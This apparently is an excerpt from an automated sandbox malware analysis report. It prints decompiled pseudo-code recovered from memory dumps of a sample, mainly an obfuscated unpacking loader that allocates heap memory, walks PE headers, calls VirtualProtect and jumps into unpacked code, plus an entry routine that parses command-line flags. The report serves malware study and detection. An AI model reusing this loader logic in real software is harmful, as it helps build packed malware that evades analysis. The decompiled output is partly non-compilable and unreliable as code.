        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 393aadb7488ace6f0398989fbb3619e453daefe09e21f529253c166874687441
        • Instruction ID: ed779c985a60a2357f1496db589dbaefa7fa4b1b4fe3805f53bb24b2249f3c84
        • Opcode Fuzzy Hash: 393aadb7488ace6f0398989fbb3619e453daefe09e21f529253c166874687441
        • Instruction Fuzzy Hash: 5A326A79E90604DFEB48CFA8E88599BBBF2FB48314B044C6AD405EB340D7749965EF10
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 63%
        			E02442209(signed int __ecx, signed int __edx, signed int __edi, intOrPtr _a4, intOrPtr _a8, signed int _a16) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				signed int _v32;
        				signed int _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				signed int _v48;
        				signed int _v52;
        				intOrPtr _v56;
        				void* __ebx;
        				signed int* _t81;
        				intOrPtr _t83;
        				signed int* _t84;
        				intOrPtr _t96;
        				int _t108;
        				intOrPtr* _t117;
        				signed int _t132;
        				intOrPtr _t140;
        				intOrPtr _t142;
        				intOrPtr _t144;
        				signed int _t145;
        				intOrPtr _t146;
        				signed int _t148;
        				void* _t160;
        				signed int _t168;
        				void* _t176;
        				intOrPtr _t189;
        				signed int _t194;
        				signed int _t196;
        				void* _t203;
        				intOrPtr _t214;
        
        				_t196 = __edx;
        				_t166 = __ecx;
        				 *0x2449861 =  *0x2449861 ^ __edi;
        				_v8 = 0xc6f8e435;
        				asm("adc eax, [0x244983d]");
        				_t81 =  *0x2449821; // 0x2449741
        				 *0x24497d5 =  *0x24497d5 ^  *_t81;
        				_v36 = 0xc6f8e434;
        				_t83 =  *0x2449795; // 0xff4dd7d5
        				 *0x24497cd =  *0x24497cd + _t83;
        				_t148 = 0;
        				_t84 =  *0x24497ad; // 0x24497cd
        				 *0x24497d1 =  *0x24497d1 ^  *_t84;
        				 *0x2449358 = E02442209;
        				_v12 = 0;
        				 *0x2449801 =  *0x2449801 | __ecx;
        				 *0x24497b9 =  *0x24497b9 | 0x00005f04;
        				_push(__edi);
        				 *0x2449745 =  *0x2449745 & __edx;
        				 *0x24497d5 =  *0x24497d5 | 0x00005a39;
        				 *0x24497f9 = 0x6c93;
        				_v16 = (_v36 ^ 0x2a823c2b) + 0x138527e2;
        				_v44 = 0;
        				while(1) {
        					 *0x2449755 = 0x1f9a;
        					 *0x2449845 = 0x6731;
        					if(_t148 >= _v16) {
        						goto L8;
        					}
        					 *0x2449839 =  *0x2449839 + 0x2449749;
        					 *0x2449789 = 0x6771;
        					if(_t148 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        						_t168 = _a4 +  *((intOrPtr*)(_v40 + _t148 * 4));
        						 *0x2449805 = 0x1b5c;
        						_v32 = _t168;
        						if(_t168 != 0) {
        							L10:
        							 *0x2449841 = 0x4e9;
        							asm("adc dword [0x2449739], 0x3853");
        							asm("sbb dword [0x244977d], 0x244984d");
        							 *0x24497c1 =  *0x24497c1 + 0x5651;
        							E02441000(_t148, 0x138527e2, _a8, _v32,  &_v12);
        						}
        						goto L11;
        					} else {
        						 *0x24497c9 =  *0x24497c9 & 0x00001be9;
        						_t132 = E02441D6E(_t166, _t196, _a4);
        						 *0x2449849 =  *0x2449849 - 0x63d3;
        						_v16 = _t132;
        						 *0x24497fd =  *0x24497fd + _t196;
        						_t188 = _v16;
        						 *0x2449849 =  *0x2449849 - 1;
        						 *0x244974d = 0x3da3;
        						if(_v16 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        							L14:
        							 *0x24497bd =  *0x24497bd - 0x244983d;
        							 *0x2449839 =  *0x2449839 | 0x00003b7e;
        							_t96 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        						} else {
        							 *0x244978d =  *0x244978d - 1;
        							 *0x2449815 =  *0x2449815 | 0x00003237;
        							 *0x2449444 = E02441C79(_t148, _t188, _a4, _v16);
        							 *0x2449789 =  *0x2449789 - _t148;
        							_t189 =  *0x2449444; // 0x74b81020
        							 *0x24497f9 =  *0x24497f9 & 0x02449855;
        							 *0x244978d = 0x3836;
        							if(_t189 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        								goto L14;
        							} else {
        								_t140 =  *0x2449444; // 0x74b81020
        								_v16 =  *((intOrPtr*)(_t140 + 0x18));
        								 *0x2449795 =  *0x2449795 - 1;
        								_t142 =  *0x2449444; // 0x74b81020
        								 *0x2449809 = 0x1722;
        								asm("sbb dword [0x2449809], 0x2449841");
        								_v40 = _a4 +  *((intOrPtr*)(_t142 + 0x20));
        								_t144 =  *0x2449444; // 0x74b81020
        								 *0x24497cd =  *0x24497cd - 0x2449745;
        								_t194 = _a4 +  *((intOrPtr*)(_t144 + 0x24));
        								_t145 =  *0x2449839; // 0xcab5f2bc
        								asm("adc eax, [0x24497cd]");
        								 *0x2449839 = _t145;
        								_v48 = _t194;
        								_t146 =  *0x2449444; // 0x74b81020
        								 *0x24497d5 =  *0x24497d5 ^ _t194;
        								_t168 = _a4 +  *((intOrPtr*)(_t146 + 0x1c));
        								_v52 = _t168;
        								 *0x2449781 = 0x5bca;
        								L11:
        								 *0x2449855 =  *0x2449855 + _t168;
        								_t166 = _v12;
        								 *0x244984d =  *0x244984d & 0x00005e63;
        								 *0x2449805 = 0x5cc;
        								 *0x24497c9 = 0xc84;
        								if(_v12 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        									 *0x2449755 = 0x6f48;
        									_t148 = _t148 + 1;
        									continue;
        								} else {
        									 *0x2449739 = 0x71a4;
        									 *0x24497bd = 0x12eb;
        									_t166 = _v52;
        									_v56 =  *((intOrPtr*)(_v52 + ( *(_v48 + _t148 * 2) & 0x0000ffff) * 4));
        									goto L8;
        								}
        							}
        						}
        					}
        					L20:
        					return _t96;
        					L8:
        					_t168 = _v12;
        					asm("adc dword [0x2449809], 0x2449741");
        					if(_t168 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        						goto L14;
        					} else {
        						asm("sbb dword [0x2449811], 0x2449839");
        						 *0x2449851 = 0x16e6;
        						if(_v44 == 0) {
        							_v24 = _v56 + _a4;
        							asm("sbb [0x2449739], eax");
        							 *0x2449809 =  *0x2449809 & 0x024497c5;
        							 *0x244978d = 0x2b74;
        							if(_a16 != 0) {
        								_v28 = 0;
        								asm("sbb [0x2449861], ecx");
        								_t203 = 3;
        								asm("sbb dword [0x24497c9], 0x5c63");
        								_push(_t203 + 8);
        								 *0x24497fd =  *0x24497fd | _t168;
        								_pop(_t176);
        								_t160 = 6;
        								_t214 = _t214 - _a16 * (_t176 - 1 - _t160 - 1 - 1);
        								_v28 = _t214;
        								_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        								if(_v16 != _a16) {
        									_t117 =  &_a16;
        									do {
        										_t117 = _t117 + 4;
        										 *((intOrPtr*)(_v28 + _v16 * 4)) =  *_t117;
        										_v16 = (_v36 ^ 0x2a823c2b) + _v16 + 0x138527e2;
        									} while (_v16 != _a16);
        								}
        							}
        							_v20 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        							_t108 = VirtualProtect(0 + _v24 - 1, ??, ??, ??); // executed
        							_push(_t108);
        							_v20 = _v20 + 1 +  *((intOrPtr*)(_t214 - 1 + 0x234)) - 1;
        							_t96 = _v20;
        						} else {
        							goto L10;
        						}
        					}
        					goto L20;
        				}
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bd8316e2cb387ffdd2b9cae6e9e3cdd4dfacc7583b4ab1e0135a180191150401
        • Instruction ID: d46639d4b98ff0c152aed5dfba2691b0339a1d65d871ddc8664d7bb7f45bab40
        • Opcode Fuzzy Hash: bd8316e2cb387ffdd2b9cae6e9e3cdd4dfacc7583b4ab1e0135a180191150401
        • Instruction Fuzzy Hash: DFC13A78E94604DFEB08CF58E895EAB77F2FB48308B44885AE805D7341E7759924EF44
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E0244266E(void* __eax, void* __edx, signed int __edi) {
        				intOrPtr* _t140;
        				signed int _t141;
        				signed int _t153;
        				signed int _t169;
        				intOrPtr _t170;
        				intOrPtr _t173;
        				intOrPtr _t185;
        				signed int _t186;
        				signed int* _t195;
        				signed int* _t196;
        				signed int _t198;
        				intOrPtr* _t206;
        				intOrPtr* _t215;
        				signed int _t218;
        				intOrPtr _t219;
        				void* _t228;
        				intOrPtr* _t229;
        				intOrPtr _t250;
        				signed int _t251;
        				signed int _t253;
        				signed int _t266;
        				signed int _t269;
        				signed int _t271;
        				intOrPtr _t279;
        				intOrPtr _t296;
        				signed int _t297;
        				void* _t301;
        				signed int _t303;
        				signed int* _t317;
        				signed int** _t326;
        				char* _t327;
        				intOrPtr _t330;
        				intOrPtr _t331;
        				intOrPtr _t332;
        				intOrPtr _t333;
        				intOrPtr _t338;
        				signed int _t341;
        				intOrPtr _t346;
        				signed int _t352;
        				signed int _t358;
        				intOrPtr _t365;
        				void* _t366;
        				void* _t381;
        
        				_t366 = __edx;
        				_t140 = __eax + 0x24497fd;
        				if(_t140 > 0) {
        					asm("in al, dx");
        					asm("in eax, 0x72");
        					 *_t140 =  *_t140 + _t140;
        					_t141 =  *0x24492e0; // 0x19fde0
        					 *0x2449851 = 0x5958;
        					 *(_t381 - 0x18) = 0xc6f8e435;
        					 *(_t381 - 0x38) = 0;
        					 *0x24497f9 = __edi;
        					 *(_t381 - 0x10) = 0xc6f8e434;
        					_push(__edi);
        					 *(_t381 - 0xc) = 0xc6f8e679;
        					 *(_t381 - 8) = _t141;
        					 *0x2449749 = __edi;
        					while(1) {
        						asm("sbb dword [0x2449795], 0x7c00");
        						if(( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2 == 0) {
        							break;
        						}
        						 *(_t381 - 0x1c) =  *(_t381 - 0xc) *  *(_t381 - 0x10);
        						 *0x244985d =  *0x244985d - 0x244983d;
        						asm("adc dword [0x2449849], 0x2449801");
        						 *(_t381 - 0x28) =  *(_t381 - 0xc) +  *(_t381 - 0x18);
        						do {
        							 *0x244985d =  *0x244985d | 0x02449755;
        							RtlAllocateHeap(0); // executed
        							 *0x2449749 =  *0x2449749 | 0x02449801;
        						} while (IsCharAlphaNumericW(0x31) == 0);
        						_t153 =  *(_t381 - 0xc);
        						_t315 = _t381 - 0x24;
        						 *0x2449845 = 0x3b0e;
        						 *(_t381 - 0x38) = _t381 - 0x24;
        						 *(_t381 - 0x14) = 0xc6f8e434;
        						 *0x2449815 = 0x1c6f;
        						 *(_t381 - 0x28) = _t153;
        						 *0x2449801 = 0x5773;
        						 *(_t381 - 0x1c) = 0xc6f8e435;
        						 *0x2449755 = 0x75b3;
        						 *0x24491a0 = 0x2449028;
        						 *0x2449805 = 0x279e;
        						if(_t153 != 0xc6f8e5bc) {
        							 *0x244977d = 0xf85;
        							 *0x244980d = 0x67ac;
        							if(_t153 != 0xc6f8e514) {
        								L10:
        								 *0x2449801 = 0x55d9;
        								if( *(_t381 - 0x28) == 0xc6f8e41b) {
        									 *0x2449781 =  *0x2449781 - _t366;
        									 *(_t381 - 0x24) = ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2;
        								}
        							} else {
        								asm("sbb ecx, eax");
        								 *0x244973d = 0x2c3f;
        								_t365 =  *0x244942c; // 0x400000
        								 *0x244980d =  *0x244980d + 0x2449789;
        								 *0x2449841 = 0x2804;
        								if(( *(_t381 - 0x1c) ^ 0x2a823c2b) + 0x138527e2 == _t365) {
        									 *0x2449739 = 0x2449749 +  *0x2449739;
        									E02442F44(_t366, 0xc60001b8,  *(_t381 - 0x1c));
        									goto L10;
        								}
        							}
        						} else {
        							E024413C7(_t315, _t366);
        							 *0x2449815 = 0x4b90;
        						}
        						asm("adc ecx, [0x2449839]");
        						 *0x244973d =  *0x244973d & 0x000000ff;
        						_t317 =  *0x2449871; // 0x2449845
        						 *0x24497c1 =  *0x24497c1 |  *_t317;
        						 *(_t381 - 0x28) =  *(_t381 - 0x24);
        						asm("sbb [0x2449739], edx");
        						 *0x2449785 = 0x5cc5;
        						asm("sbb dword [0x2449859], 0x5f55");
        						 *0x2449859 = 0x73ee;
        						if( *(_t381 - 0x28) == ( *(_t381 - 0x10) ^ 0x2a823c2b) + 0x138527e2) {
        							asm("sbb [0x2449739], eax");
        							_t358 =  *0x2449855; // 0xd3d8a4ca
        							 *0x2449785 =  *0x2449785 ^ _t358;
        							 *0x244985d = 0x2d00;
        							 *0x2449739 =  *0x2449739 | 0x138527e2;
        							 *(_t381 - 0x14) = ( *(_t381 - 0x18) ^ 0x2a823c2b) + 0x138527e2;
        							_t169 =  *0x24492d0; // 0x19fdcc
        							 *0x24492d0 =  *0x24492d0 ^ _t169;
        							 *0x2449745 =  *0x2449745 + 0x4c42;
        							_t170 =  *0x24492d4; // 0x2440000
        							 *0x2449254 = _t170;
        							asm("sbb [0x2449781], ecx");
        							 *0x2449024 =  *0x24492d8;
        							_t173 =  *0x24492dc; // 0xe193d4a8
        							 *0x2449855 =  ~( *0x2449855);
        							 *0x2449274 = _t173;
        						}
        						asm("adc dword [0x24497cd], 0x62f2");
        						asm("sbb dword [0x24497d5], 0x24497c1");
        						 *0x2449785 =  *0x2449785 | 0x02449849;
        						 *0x2449809 =  *0x2449809 - 0x244983d;
        						 *0x244973d =  *0x244973d ^ 0x000036b8;
        						 *(_t381 - 0xc) = ( *(_t381 - 0xc) ^ 0x2a823c2b) - ( *(_t381 - 0x10) ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
        					}
        					 *0x244973d =  *0x244973d ^ 0x0244984d;
        					 *(_t381 - 0x34) =  *(_t381 - 8);
        					asm("sbb eax, eax");
        					_t185 =  *0x24491a0; // 0x2449028
        					 *(_t381 - 0xc) = 0xc6f8e435;
        					 *(_t381 - 0x38) = 0xc6f8e465;
        					_t369 = 0xc6f8e434;
        					 *(_t381 - 0x28) = 0xc6f8e434;
        					 *0x2449805 =  *0x2449805 | 0x00001f5f;
        					 *0x2449795 =  *0x2449795 | 0x02449785;
        					 *0x24497d1 = 0x3c4b;
        					if(( *(_t381 - 0x28) ^ 0x2a823c2b) + 0x138527e2 ==  *0x2449024) {
        						L37:
        						_t186 =  *(_t381 - 0xc);
        					} else {
        						_t43 = _t185 + 0x1c8; // 0x2449264
        						 *0x2449841 =  *0x2449841 + 0x3492;
        						 *(_t381 - 0x38) = 0xc6f8e408;
        						 *0x2449859 =  *0x2449859 - 0x55f2;
        						 *(_t381 - 1) = 0x85;
        						 *0x24497d5 =  *0x24497d5 - 0x6364;
        						 *0x2449745 =  *0x2449745 | 0x024497c5;
        						asm("adc dword [0x244985d], 0x2449789");
        						 *0x2449789 = 0x2098;
        						asm("adc dword [0x2449779], 0x65bc");
        						 *0x2449781 = 0x1a64;
        						if(( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2 == ( *( *_t43) ^ 0x2a823c2b) + 0x138527e2) {
        							goto L37;
        						} else {
        							asm("adc dword [0x2449791], 0x6fee");
        							asm("adc dword [0x2449801], 0x2449845");
        							 *(_t381 - 0x14) =  *(_t381 - 0xc);
        							 *0x2449855 =  *0x2449855 ^ 0x024497f9;
        							 *0x244984d =  *0x244984d - 0x24497f9;
        							 *0x244973d =  *0x244973d & 0x02449749;
        							_t228 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
        							while(1) {
        								_t338 =  *0x24491a0; // 0x2449028
        								_t52 = _t338 + 0x194; // 0x2449204
        								_t296 =  *((intOrPtr*)( *_t52));
        								_t297 =  *(_t296 + 0x3c);
        								 *0x24497d1 = 0x5783;
        								if(_t228 >=  *((intOrPtr*)(_t297 + _t296 + 0x28))) {
        									break;
        								}
        								_t341 =  *0x2449849; // 0x7c7a
        								 *0x244980d =  *0x244980d + _t341;
        								 *(_t381 - 0x14) = ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x00000001 ^ 0x2a823c2b;
        								_t228 = _t228 + 1;
        							}
        							_t229 =  *0x244975d; // 0x244977d
        							 *0x244984d =  *0x244984d +  *_t229;
        							 *(_t381 - 0x38) = _t369;
        							asm("adc ecx, [0x2449859]");
        							_t346 =  *0x24491a0; // 0x2449028
        							 *0x2449851 =  *0x2449851 + 0x2449741;
        							_t58 = _t346 + 0x194; // 0x2449204
        							 *0x2449789 =  *0x2449789 + 0x1acf;
        							 *0x244977d =  *0x244977d & 0x0244978d;
        							 *0x24492cc = ( *(_t381 - 0x14) ^ 0x2a823c2b) +  *((intOrPtr*)( *_t58)) + 0x138527e2;
        							 *(_t381 - 8) = 0x1e725789;
        							 *(_t381 - 0x14) = 0xc6f8e455;
        							 *0x244983d = 0x1113;
        							 *0x244984d =  *0x244984d | 0x02449849;
        							 *0x2449861 =  *0x2449861 + 0x2449739;
        							_t352 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
        							 *0x2449841 = 0x5ec5;
        							 *(_t381 - 0x28) = _t352;
        							 *0x2449859 = 0x64a7;
        							if(_t352 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2) {
        								_t66 = _t352 - 0x138527e2; // 0xb373be97
        								_t301 = (_t297 & 0x0000099c) + 0x414f;
        								 *(_t381 - 0x10) = _t66;
        								do {
        									 *0x2449841 =  *0x2449841 - 0x2449861;
        									 *0x24497cd =  *0x24497cd + 0x138527e2;
        									_t303 =  *0x2449809; // 0x2009085
        									 *0x244974d =  *0x244974d | _t303;
        									 *0x2449815 =  *0x2449815 & 0x02449801;
        									 *(_t381 - 8) = (( *(_t381 - 0x10) ^ 0x2a823c2b) * 0xdf41139d ^ 0xc6f8e08e) +  *(_t381 - 8);
        									 *0x244983d =  *0x244983d + _t303;
        									_t250 =  *0x24492cc; // 0x4f41139d
        									 *((intOrPtr*)(_t381 - 0x30)) = _t250;
        									asm("adc ebx, ebx");
        									_t251 =  *(_t381 - 8);
        									_t369 = _t251 % 0xc6f8e408;
        									asm("sbb eax, [0x2449801]");
        									_t253 =  *(_t381 - 0x10);
        									asm("adc dword [0x24497bd], 0x4ebe");
        									if(_t251 % 0xc6f8e408 == 0) {
        										asm("adc [0x2449755], edx");
        										_t369 =  *(_t381 - 8);
        										 *0x2449839 = ( *0x2449839 & 0x000000ff) -  *0x2449809;
        										 *0x2449781 =  *0x2449781 + ( *0x24497c9 & 0x0000ffff);
        										 *0x2449849 =  *0x2449849 ^ _t369;
        										 *0x2449811 = 0x3142;
        										 *(_t381 - 8) = (_t253 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 & _t369;
        									} else {
        										 *0x2449749 =  *0x2449749 - 0x4d1b;
        										 *0x24497bd =  *0x24497bd | 0x02449795;
        										 *(_t381 - 8) =  *(_t381 - 8) - ((_t253 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
        									}
        									asm("adc eax, ebx");
        									 *0x2449785 =  *0x2449785 - 0xdc8;
        									_t301 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
        									 *0x24497d5 = 0x4d84;
        									 *0x2449801 = 0x2574;
        									if(_t301 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2) {
        										_t84 = _t301 - 0x138527e2; // 0xb373be97
        										 *0x2449815 =  *0x2449815 ^ 0x00001809;
        										 *(_t381 - 0x1c) = _t84;
        										do {
        											 *0x2449861 =  *0x2449861 - 0x138527e2;
        											asm("adc [0x2449745], ecx");
        											_t266 =  *(_t381 - 0x1c) ^ 0x2a823c2b;
        											 *(_t381 - 0x2c) = _t266;
        											asm("sbb dword [0x24497b9], 0x73b9");
        											 *(_t381 - 8) =  *(_t381 - 8) - (_t266 * 0xc601139d ^ 0xc6f8d08e);
        											_t269 =  *(_t381 - 8);
        											_t369 = _t269 % 0xc6f8e408;
        											_t271 =  *(_t381 - 0x10);
        											if(_t269 % 0xc6f8e408 == 0) {
        												 *(_t381 - 8) = (_t271 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 &  *(_t381 - 8);
        											} else {
        												 *(_t381 - 8) =  *(_t381 - 8) - ((_t271 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
        											}
        											if( *(_t381 - 0x2c) == 0xc6f8e465) {
        												_t279 =  *0x24491a0; // 0x2449028
        												_t101 = _t279 + 0x194; // 0x2449204
        												 *( *(_t381 - 0x34)) =  *((intOrPtr*)(_t381 - 0x30))( *((intOrPtr*)( *_t101)),  *0x2449024,  *0x2449274);
        											}
        											_t301 = _t301 + 1;
        											 *(_t381 - 0x1c) =  *(_t381 - 0x1c) + 1;
        										} while (_t301 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2);
        										_t352 =  *(_t381 - 0x28);
        									}
        									_t352 = _t352 + 1;
        									 *(_t381 - 0x10) =  *(_t381 - 0x10) + 1;
        									 *(_t381 - 0x28) = _t352;
        								} while (_t352 < ( *(_t381 - 0x14) ^ 0x2a823c2b) + 0x138527e2);
        							}
        							 *0x2449218 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
        							 *0x2449220 = ( *(_t381 - 0xc) ^ 0x2a823c2b) + 0x138527e2;
        							_t186 =  *(_t381 - 0x38);
        						}
        					}
        					 *(_t381 - 0x14) = (_t186 ^ 0x2a823c2b) + 0x138527e2;
        					 *(_t381 - 0x14) =  *(_t381 - 0x14) - 0x138527e2 ^ 0x2a823c2b;
        					_t325 =  *(_t381 - 0x18);
        					if( *(_t381 - 0x18) !=  *(_t381 - 0x14)) {
        						_t326 =  *0x24492e0; // 0x19fde0
        						_t195 = ( *(_t381 - 0x18) ^ 0x2a823c2b) + 0x138527e2;
        						 *_t326 = _t195;
        					} else {
        						_t196 =  *0x244901c; // 0x2449438
        						 *(_t381 - 0x20) =  *(_t381 - 0x20) & 0x00000000;
        						 *(_t381 - 0x20) =  *(_t381 - 0x20) |  *_t196;
        						_t198 =  *0x24492c4; // 0xc7e310bf
        						 *(_t381 - 0x38) = _t198;
        						 *(_t381 - 0x38) = 0xc6f8e475;
        						 *(_t381 - 0x28) = 0xc6f8e408;
        						 *(_t381 - 1) = 0x85;
        						_t206 =  *0x24491c0; // 0x2449428
        						E02442209(_t325, _t369, 0x138527e2,  *_t206, 0x2449116, 1, 4); // executed
        						_t327 =  *0x24492c8; // 0x2442646
        						 *_t327 = ( *(_t381 - 1) ^ 0x0000003f) + 0x2f;
        						_t330 =  *0x24492c8; // 0x2442646
        						_t331 =  *0x24492b8; // 0x24590b3
        						_t332 =  *0x24492c8; // 0x2442646
        						 *((intOrPtr*)(_t332 + 1)) = 0xec7ad81e - ( *(_t381 - 0x28) ^ 0x2a823c2b) - _t330 + _t331;
        						_t215 =  *0x24492b8; // 0x24590b3
        						 *_t215( *0x2449358,  *0x2449254,  *0x2449024,  *0x2449274,  *(_t381 - 0x20),  *0x24491a0,  *0x24492c8, ( *(_t381 - 0x28) ^ 0x2a823c2b) + 0x138527e2, ( *(_t381 - 0x38) ^ 0x2a823c2b) + 0x138527e2, _t381 - 0x3c);
        						 *0x24492d0 = _t381 + 4;
        						_t218 =  *0x24492d0; // 0x19fdcc
        						_t333 =  *0x2449218; // 0x2040000
        						 *_t218 =  *_t218 + _t333;
        						_t219 =  *0x24491a0; // 0x2449028
        						_t137 = _t219 + 0x1cc; // 0x2449440
        						_t195 =  *0x24492e0; // 0x19fde0
        						 *_t195 =  *_t195 |  *( *_t137);
        					}
        					return _t195;
        				} else {
        					 *_t140 =  *_t140 + _t140;
        					asm("sldt word [eax]");
        					 *0x2449815 = 0x1ed3;
        					asm("sldt word [eax]");
        					return 0xc6713389;
        				}
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2a795cb734958492f6ef023159ed947ac6d133d1f40d175b3443caaba2ccb616
        • Instruction ID: 674ad5c822bfb4dea22f6d794b47a2ada55dd5104c14f2cc361af4ee7c96fd9f
        • Opcode Fuzzy Hash: 2a795cb734958492f6ef023159ed947ac6d133d1f40d175b3443caaba2ccb616
        • Instruction Fuzzy Hash: DCE19C79E90604DFEB08CFA8E88599BBBF2FB48314B144C5AE405EB351D7709965EF10
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 53%
        			E00415552() {
        				void* _t30;
        				void* _t33;
        				intOrPtr* _t35;
        				void* _t36;
        				void* _t39;
        				void* _t41;
        
        				_t39 = _t41 - 0x74;
        				_t17 = _t39 - 0x260;
        				 *((char*)(_t39 + 0x73)) = 0;
        				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
        				if(_t17 != 0) {
        					L8:
        					E004111B9(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
        				} else {
        					PathAddBackslashW(_t39 - 0x260);
        					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
        					while(1) {
        						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
        						if(_t17 != 0) {
        							break;
        						}
        						PathRemoveBackslashW(_t39 - 0x260);
        						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
        							goto L8;
        						} else {
        							PathAddBackslashW(_t39 - 0x260);
        							continue;
        						}
        						goto L9;
        					}
        					if( *((short*)(_t39 - 0x44)) != 0x7b) {
        						goto L8;
        					} else {
        						 *((short*)(_t39 + 8)) = 0;
        						_t17 = _t39 - 0x44;
        						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
        						if(_t17 != 0) {
        							goto L8;
        						} else {
        							 *((char*)(_t39 + 0x73)) = 1;
        						}
        					}
        				}
        				L9:
        				return  *((intOrPtr*)(_t39 + 0x73));
        			}

        APIs
        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 00415571
        • PathAddBackslashW.SHLWAPI(?), ref: 00415588
        • PathRemoveBackslashW.SHLWAPI(?), ref: 00415599
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 004155A6
        • PathAddBackslashW.SHLWAPI(?), ref: 004155B7
        • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 004155C6
        • CLSIDFromString.OLE32(?,?), ref: 004155E0
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
        • String ID:
        • API String ID: 613918483-0
        • Opcode ID: 5219857b68e5ef302cb5446ba1590e2057f0d5cdd0a55ed3acf8b3b821d0c263
        • Instruction ID: 5a4938543e013854fceabb10c3023cdc853cff9575463981f244d27b68a6c6f8
        • Opcode Fuzzy Hash: 5219857b68e5ef302cb5446ba1590e2057f0d5cdd0a55ed3acf8b3b821d0c263
        • Instruction Fuzzy Hash: 3411AF7150410CEADB209BB0CD88EEF77BEEB44344F180067B611E3120E638DA889B68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			_entry_(signed int __ecx, void* __edx, void* __eflags) {
        				char _v5;
        				int _v12;
        				char _v16;
        				char _v20;
        				void* _t22;
        				void* _t28;
        				char _t29;
        				char _t33;
        				signed int _t36;
        
        				_t34 = __ecx;
        				_t33 = 0; // executed
        				_t22 = E00406532(__ecx, __edx, 0); // executed
        				if(_t22 == 0) {
        					L24:
        					__eflags = _t33;
        					_t21 = _t33 == 0;
        					__eflags = _t21;
        					ExitProcess(0 | _t21);
        				}
        				_v20 = 0;
        				_v16 = 1;
        				_v5 = 0;
        				SetErrorMode(0x8007);
        				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
        				if(_t28 == 0) {
        					L19:
        					_t29 = E0040716E(_t34, __eflags, _v20, _v16);
        					L20:
        					_t33 = _t29;
        					L21:
        					if(_t33 == 0 || ( *0x41e590 & 0x00000002) == 0) {
        						goto L24;
        					} else {
        						Sleep(0xffffffff);
        						return _t29;
        					}
        				}
        				_t36 = 0;
        				if(_v12 <= 0) {
        					L14:
        					LocalFree(_t28);
        					_t48 = _t33;
        					if(_t33 == 0) {
        						__eflags = _v5;
        						if(__eflags == 0) {
        							goto L19;
        						}
        						E00418161(_t36);
        						_t29 = E00417D20();
        						__eflags =  *0x41e590 & 0x00000004;
        						_t33 = _t29;
        						if(( *0x41e590 & 0x00000004) != 0) {
        							_t29 = E00418086(0x41fe78, 0);
        						}
        						goto L21;
        					}
        					_t29 = E00406FCD(_t48);
        					goto L20;
        				} else {
        					goto L3;
        				}
        				do {
        					L3:
        					_t34 =  *(_t28 + _t36 * 4);
        					if(_t34 != 0 &&  *_t34 == 0x2d) {
        						_t34 =  *(_t34 + 2) & 0x0000ffff;
        						if(_t34 == 0x66) {
        							_v20 = 1;
        						} else {
        							if(_t34 == 0x69) {
        								_t33 = 1;
        							} else {
        								if(_t34 == 0x6e) {
        									_v16 = 0;
        								} else {
        									if(_t34 == 0x76) {
        										_v5 = 1;
        									}
        								}
        							}
        						}
        					}
        					_t36 = _t36 + 1;
        				} while (_t36 < _v12);
        				goto L14;
        			}

        APIs
